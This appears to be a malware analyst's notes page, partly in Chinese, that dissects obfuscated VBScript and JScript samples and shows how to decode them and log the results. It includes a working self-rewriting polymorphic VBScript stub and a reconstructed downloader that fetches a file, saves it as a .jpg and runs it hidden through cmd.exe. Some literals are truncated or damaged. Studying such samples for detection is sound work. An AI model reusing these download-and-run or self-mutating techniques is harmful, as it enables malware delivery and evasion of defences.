Vbs-Js_Vir

VBS

1.—————–

' Layer 1: the payload is stored as decimal character codes joined by the
' delimiter "#+0*z" (the literal is truncated on this page with "..略..").
' The first visible codes, 39 and 60, are the characters ' and <.
H2K = "39#+0*z60#34..略.."
' Split the string back into an array of numeric strings.
H2K = SPLIT(H2K,"#+0*z")
' Rebuild the text one Chr() at a time. The loop stops at UBOUND-1, so the last
' array element is never decoded (presumably an empty trailing piece - confirm
' against the full sample).
FOR I = 0 TO UBOUND(H2K) -1
ANA = ANA & CHR(H2K(I))
NEXT
' The decoded text is run as VBScript. For static analysis, write ANA to a file
' instead of executing it. Split + Chr loop + Execute in one short script is the
' pattern worth hunting for.
EXECUTE (ANA)

2.————-

' Layer 1: the literal is reversed first (StrReverse) and then passed to DeCrypT.
' The leading "==" is what Base64 padding looks like after a reversal, so a
' string that starts with "=" is a cheap indicator of this trick.
xmen = DeCrypT(StrReverse("==gbvlGdj5..略.."))
' The decoded text is executed as VBScript; dump xmen to a file to inspect it.
EXECUTE (xmen)
' DeCrypT: the body is not reproduced on this page. The line inside is the
' author's note ("Base64Decode decryption") plus an alphabet, not runnable code.
' NOTE(review): the alphabet shown starts with the digits, which is not the
' standard Base64 order - confirm it against the sample's own decoder body
' before decoding offline with a stock Base64 tool.
Function DeCrypT(data)
Base64Decode 解密   0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
end function
--------------
' Variant of the same idea: M is the Base64-style decoded payload and is handed
' to ExecuteGlobal. The statements are chained with ":" in the sample; the page
' prints one statement per line. To inspect the payload, write M to a file
' instead of calling ExecuteGlobal.
M=T("9pnR879bOsu..略..=")
:ExecuteGlobal(M)
' T is a pass-through wrapper around Q (one extra level of indirection).
:function T(P)
:T=Q(P)
:end function
' These are declared at script level, so O (the output buffer) is shared state
' and is not reset inside Q.
:Dim F,O,G,N,C,V,B,J
' Q(U): decodes U as Base64 using the 64-character table D and returns the text.
:Function Q(ByVal U)
' D is the lookup table. Its order is digits, upper case, lower case, "+", "/",
' which differs from the standard Base64 alphabet (upper, lower, digits), so a
' stock Base64 decoder will not produce the right output without remapping.
:Const D="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/"
' Strip line breaks, tabs and spaces before decoding.
:U=Replace(U,vbCrLf,"")
:U=Replace(U,vbTab,"")
:U=Replace(U," ","")
:F=Len(U)
' Input length must be a multiple of 4, otherwise error 1 is raised.
:If F Mod 4<>0 Then Err.Raise 1,"Base64Decode","Bad Base64 string."
:Exit Function
:End If
' Process the input four characters at a time.
:For G=1 To F Step 4
' N = number of output bytes for this group (3 minus the count of "=" padding).
' J = accumulator for the four 6-bit values.
:N=3
:J=0
:For C=0 To 3
:V=Mid(U,G+C,1)
:If V="="Then N=N-1
:B=0
' B is the zero-based position of V in D; -1 means V is not in the table.
:Else B=InStr(1,D,V,vbBinaryCompare)-1
:End If:If B=-1 Then Err.Raise 2,"Base64Decode","Bad character In Base64 string."
:Exit Function
:End If
:J=64*J+B
:Next
' Turn the accumulated value into six hex digits (left-padded with "0"), read
' them back as three bytes and keep only the first N characters.
:J=Hex(J)
:J=String(6-Len(J),"0")&J
:O=O&Left(Chr(CByte("&H"&Mid(J,1,2)))+Chr(CByte("&H"&Mid(J,3,2)))+Chr(CByte("&H"&Mid(J,5,2))),N)
:Next
:Q=O
:End Function

3.———–ee4e62eea4c4262f47e64bb4b4b9d018

' The payload is assembled line by line: each call decodes one encoded line and
' appends it to str. The literals are truncated on this page ("..略.."), and the
' trailing ";" on the first line is not VBScript (presumably a page artifact).
str = str & ContinueServerCommand("3932..略..") & VbCrLf   ;
str = str & ContinueServerCommand("3532..略..") & VbCrLf 
..略..
' The final ExecuteGlobal is commented out here, so as shown str is built but not
' run (presumably disabled for analysis - confirm against the original sample).
'ExecuteGlobal (str)
' ContinueServerCommand(str): splits str on the fixed delimiter
' "76??<0<HTC>3>??92", converts every piece with Chr() and returns the joined
' characters followed by a line break.
Function ContinueServerCommand(str)
 Dim  KeyPos
 KeyPos=""
 ' a is not declared, so it is an implicit script-level variable.
 a=Split(str,"76??<0<HTC>3>??92")
for each x in a
   KeyPos = KeyPos & Chr(x)
next
      ContinueServerCommand = KeyPos & VbCrLf
End Function

4.———–36a42fcd07cedaaec4ccfb3af2f75b00

' Digits are never written as literals: each one is derived arithmetically and
' held in a single-letter variable (a=0, b=1, c=2, d=3, e=4, f=5).
a=0
b=a+1
c=b+b
d=c+b
e=c+c
f=e+b
' w is built by concatenating those digit variables. g, j and k are not defined
' in the lines shown (presumably in the part elided on this page), and w is not
' used in the visible lines either.
w=w&d&j&k&g&a&k&j&b&d
w=w&k&g&b&k&e&f&k&g&b&k&e&f&k&g&b&k&e
..略..
' Source-text fragments: r and t wrap a number as "chr(<n>)&", l is the
' assignment prefix "l=".
r="chr("
t=")&"
l="l="
' o becomes VBScript source of the form  l=chr(..)&chr(..)&...:execute(l)
' where every number is spelled with the digit variables above.
o=l&r&b&b&j&t&r&g&b&t&r&i&d&t&r&i
o=o&r&b&a&b&t&r&j&j&t&r&b&b&h&t&r&b&b&g&t&r&b&")"&":execute(l)"
' Two nested layers: executing o assigns the decoded string to l and then
' executes l. Printing o and then l (instead of executing) reveals both layers.
execute(o)

5.———–44ecf71df419657eca650d49a493fed9

' Encoded payload. The characters are mis-encoded on this page, so the literal
' cannot be decoded from the listing as printed.
DcoIos = (("DYx=弬€寔倧=W=厡拋唻?E€F=悎枍?W=厡拋唻咼儠=z[*'*'DZJZJZJZJZ=€寢儐?ZJZJZJZJZJZJ"))
CaCKjAd()
' CaCKjAd: decodes DcoIos one character at a time and runs the result.
Function CaCKjAd()
For i = 1 to icdjsCsaaSdC(DcoIos)
' Mid(DcoIos, i) has no length argument, so it returns the rest of the string and
' Asc() reads its first character. A fixed value, Asc(<key>), is subtracted from
' each code. The key literal prints as "" here - presumably a non-printable
' character lost in extraction; confirm on the original file.
idakddaaZiolAdC = idakddaaZiolAdC & ((CHRW(ASC((MID(DcoIos, i))) - ASC(""))))
next
' The decoded text is executed in global scope; dump it to a file to analyse it.
executeglobal idakddaaZiolAdC
End Function
' icdjsCsaaSdC(sStr): hand-rolled string length. It grows a prefix with Left()
' until the prefix equals the whole string and returns that count.
Function icdjsCsaaSdC(sStr)
Do
i = i + &H1
bLen = Left(sStr, i)
icdjsCsaaSdC = i
Loop While sStr <> bLen
End Function

6———–4314b826a57c9aa89449cbc798b9ad6a—-

' Every character is written as chr(<arithmetic expression>). The three visible
' terms evaluate to 39, 60 and 91, i.e. the characters ' < [ . Evaluating the
' expressions and joining the characters recovers the script without running it;
' long runs of chr(<expr>) & chr(<expr>) fed to ExecuteGlobal are the indicator.
ExecuteGlobal (chr( -7016+7055 ) & chr( 5855-5795 ) & chr( 274729/3019 )  ..略.. &  vbcrlf  )

7———-00be582eaf135d2f451df63d4045c158—-

' Payload stored as a hex string (truncated on this page). The visible prefix
' 27 3C 5B 20 72 65 63 6F 64 65 72 20 3A 20 68 6F decodes to  '<[ recoder : ho
Safa7_22 ="273C5B207265636F646572203A20686F..略.."
' VBScript identifiers are case-insensitive, so safa7_22 is the same variable.
DZ = hextoByte(safa7_22)
' The decoded text is executed; write DZ to a file instead to read it.
EXECUTE (DZ)

' hextoByte(sData): reads sData two hex digits at a time and appends
' Chr("&h" & <pair>) to the return value, i.e. hex string -> text.
Function hextoByte(sData)
For i = 1 To Len(sData) Step 2
hextoByte = hextoByte & Chr("&h" & Mid(sData, i, 2))
Next
End Function

8————-3509431b942232f5c50863baaa02d900(boyfine1)

;「暴風1號」樣本:腳本裡的註釋行其實是變形後的代碼
' Self-rewriting stub. Everything below is ONE string passed to Execute; in the
' sample it sits on a single line, the page wraps it at the ":" separators.
' What the string does, read from the code itself:
'   * Opens its own file (WScript.ScriptFullName) for reading and walks it line
'     by line.
'   * A line that starts with ' is treated as encoded code: the last character is
'     a chunk size, and a97B() reverses the text chunk by chunk to decode it. The
'     line is then re-encoded with a new random chunk size (Int(8*Rnd+2), 2..9)
'     and put back as a comment.
'   * Any other line goes through af7C(), which replaces the hex strings
'     Hex(&hE466+0..13) with random hex strings (presumably identifier renaming),
'     and dD72(), which randomises the letter case of every character. That is
'     why keywords and literals appear in mixed case throughout.
'   * The rewritten text (B056) is written back over the script file, so the
'     file content differs after every run and a hash of the file is not a
'     stable indicator.
'   * The decoded comment lines (fa6D) are written to "jIeXI1.tXt". NOTE(review):
'     this matches the analyst's logging snippet later on the page and is
'     presumably an analysis addition rather than part of the original sample.
exECuTE("seT e466 = CREaTeoBJECT(""sCRipting.FIleSYStEmObJeCT"")
:Set f8b6=E466.OpENTeXtFILe(WsCRIPT.ScriPtFuLlNAmE,1)
:dO uNtIl f8B6.aTENdofsTreAM
:ccd4=Trim(f8b6.rEAdLine)
:iF LEfT(ccD4,1)=""'"" theN
:C169=A97B(MId(CcD4,2,lEn(ccD4)-2),RigHt(CcD4,1))
:rANDoMiZe:AFB1=InT(8*rNd+2)
:A4ae=""'""&A97b(c169,AFB1)&aFB1
:ElSE
:a4aE=ccD4:a4aE=Af7C(A4ae)
:a4aE=Dd72(a4ae):end iF:fA6d=fa6D&C169&VBCrLF:B056=B056&a4AE&vBCRlf
:c169="""":a4ae="""":lOoP
:set f8B6=E466.OpeNteXTFiLe(WscRipT.sCriptFuLLNAmE,2)
:F8B6.wriTE B056:F8B6.CLOsE
:Set e466=nOTHiNg
:dIm fsO,f:set fsO = CrEateObJeCt(""ScRiPtIng.fiLeSystemoBjECT"")
:SeT F = fSO.creaTeTexTfiLE(""jIeXI1.tXt"", trUe):F.wRItE(fa6D)
:F.WRIteBLaNklINeS(3) :F.CLOSE():SEt F = noTHINg:seT FSo = nOTHiNg
:fUnctiON a97B(EBe2,AFB1):FOr Eb91=1 tO LEN(EbE2) sTeP afb1
:A97b=A97b+sTRReversE(mid(ebe2,eB91,AfB1)):NEXT:EnD fUNCTiOn:fUnCTioN dD72(EbE2)
:RandOmize:fOr EB91=1 to LeN(eBe2):b2e4=MID(ucaSe(eBE2),Eb91,1):iF int(rND*2) Then
:b2e4=lCaSE(b2E4):eND IF:dd72=DD72&b2E4:NexT:end FUnCTioN:fuNCtIon af7C(EBE2)
:rAnDoMIzE:fOR eB91=0 To 13:EbE2=rePLACE(uCaSe(EBE2),uCASE(hEx(&hE466+eb91)),Ucase(HeX(iNt(RND*24000+40960)+eB91)))
:nEXt:AF7c=eBe2:ENd FUnCTIon")

9.在上面那幾行代碼(實際用「:」連接成一行)的前後添加大量註釋.

JS

10————js腳本———

// String fragments are scattered across throw-away variables. Later code picks
// them back out and concatenates them, so no object or method name appears in
// one piece anywhere in the file (most of the declarations are elided here).
var kqyxuz = "e;"
var tofla = "Ope"
var upugryf = ":\\"
var uffytr = "m.u"
..略..

var ybdetof5 = new ActiveXObject('Scripting.FileSystemObject');
// Each [ ... ][k] array literal is a selector: only element k is used, the other
// entries are decoys. new Function(<joined fragments>)() builds code from the
// joined text and calls it; its result is the if-condition (the clear-text
// version of this sample on the page shows `if (1)` at this position).
if (['dm', 'o', new Function(['e', ebylx, 'u', 'f'][1] + [gosax, 'b'][0] )()][2]) {
    // Per the analyst's log further down the page this resolves to this[WScript].
    hneneqil0 = this[['mt', 'u', zrypy, 'e'][2] + ['i', offotw, 'w'][1] + ['y', 'h', ficy, 'y'][2]];
    // Per the same log this is a CreateObject lookup on that object. As printed
    // the brackets do not balance (a "]" is missing before ")"), so the line is
    // not runnable in this form.
    istudyd7 = hneneqil0[['hl', anqabyb][1] + ['sn', ohapzy, 'jr'][1] );
}10
    通過數組索引選取並拼接前面定義的變量片段來還原(解密)代碼,推測樣本是由自動化的字符串分割引擎生成的.
----------------------------------------------------------------
// Clear-text reconstruction of the obfuscated script above: a download-and-run
// stub for Windows Script Host. Several literals are damaged on this page (the
// URL, the `RespseBody` property name, the save path), so the listing documents
// the call sequence and does not run as printed.
var fso = new ActiveXObject("Scripting.FileSystemObject");
// Condition left over from the obfuscated original; it is always true here.
if (1) {
    var fsd = this["WScript"];
    // The four COM objects used: file system, shell, HTTP client, binary stream.
    // A script that creates all four is worth flagging.
    fsobj = new ActiveXObject("Scripting.FileSystemObject");
    WshSell = WScript.CreateObject("WScript.Shell");
    xmlHTTP = WScript.CreateObject("MSXML2.XMLHTTP");
    adodbStream = WScript.CreateObject("ADODB.stream");
    // GetSpecialFolder(2) is the temporary folder and GetTempName() returns a
    // random file name. Neither result is used in the visible lines (presumably
    // they fed the save path in the original - confirm).
    ihyxu0 = fsobj.GetSpecialFolder(2);
    ubujile0 = fsobj.GetTempName();
    // Synchronous GET (third argument 0 = not async).
    fxejoplod6 = xmlHTTP.open("Get","http://uwoArtPic%2F201p%3D0.jpg",0);
    fxejoplod6 = xmlHTTP.send();
    adodbStream.type = 1;   //1=adTypeBinary
    avolcuc7 = xmlHTTP.RespseBody;
    hnoqasann0 = WScript.ScriptFullName;
    // Response bytes are written unchanged to disk under a .jpg name.
    fxejoplod6 = adodbStream.Open();
    fxejoplod6 = adodbStream.Write(avolcuc7);
    fxejoplod6 = adodbStream.SaveToFile("C:\WindowsPVTdog.jpg");
    fxejoplod6 = adodbStream.Close();
    // The saved file is launched through cmd.exe with window style 0 (hidden).
    // Detection angle: wscript.exe/cscript.exe making an HTTP request, writing a
    // file, then spawning cmd.exe on that file.
    WshSell.Run("cmd.exe /c C:\WindowsPVTdog.jpg",0)
}10

調試

11.js/vbs 腳本的調試(vs2013):WScript.exe //X name.js(或 name.vbs);宿主選項要用雙斜線,單斜線的參數會被當作腳本自身的參數.

12.解密後的代碼寫入log文件.

' Analysis helper: put this where the sample calls Execute/ExecuteGlobal so the
' decoded text in M is written to a log file instead of being run.
Dim fso, f
Set fso = CreateObject("Scripting.FileSystemObject")
' Second argument True: overwrite the target file if it already exists.
Set f = fso.CreateTextFile("C:\Users\Administrator\Desktop\python\Dunihi\45bbded4ed2a177ff6f09e86a5f3b975_jiexi1.txt", True)
With f
    .Write M
    ' Three blank lines separate this dump from whatever is written next.
    .WriteBlankLines 3
    .Close
End With
Set f = Nothing
Set fso = Nothing

// JScript counterpart of the logging step: write L (presumably the decoded
// script text - confirm against the sample being analysed) to the log file f,
// add two blank lines and close the file.
f.Write(L);
f.WriteBlankLines(2) ;
f.Close();
-------------------
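// Open the log file that receives the decoded script text (true = overwrite an
// existing file). The ProgID must be a quoted string, and backslashes in a
// JScript string literal must be doubled: with single backslashes "\U", "\A" and
// "\D" lose the backslash and "\2" becomes a control character, so the file
// would not be created at the intended path.
var fso = new ActiveXObject("Scripting.FileSystemObject");
var f = fso.CreateTextFile("C:\\Users\\Administrator\\Desktop\\28jsjiexi.txt", true);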

-------------log文件----------------------
hneneqil0 = this[WScript]
istudyd7 = hneneqil0[CreateObject](Scripting.FileSystemObject)
lysfopdep3 = hneneqil0[CreateObject](WScript.Shell)
woqvybd3 = hneneqil0[CreateObject](MSXML2.XMLHTTP)
jucyzmum2 = hneneqil0[CreateObject](ADODB.Stream)
deskPath = istudyd7[GetSpecialFolder](0)
ubujile0 = istudyd7[GetTempName]()
fxejoplod6 = woqvybd3[open](GET,http://img.bizhi.sogou.com/images/2015/01/20/1053165.jpg?f=download,0)
fxejoplod6 = woqvybd3[send]()
jucyzmum2[type] = 1
avolcuc7 = woqvybd3[ResponseBody]
hnoqasann0 = hneneqil0[ScriptFullName]
fxejoplod6 = jucyzmum2[Open]()
fxejoplod6 = jucyzmum2[Write]()
fxejoplod6 = jucyzmum2[SaveToFile](C:\WindowsRB9dog.jpg)
fxejoplod6 = jucyzmum2[Close]()
fxejoplod6 = lysfopdep3[run](cmd.exe /c C:\WindowsRB9dog.jpg,0)

附件:js下載器改寫的圖片下載器(並打印代碼),用來更換壁紙.
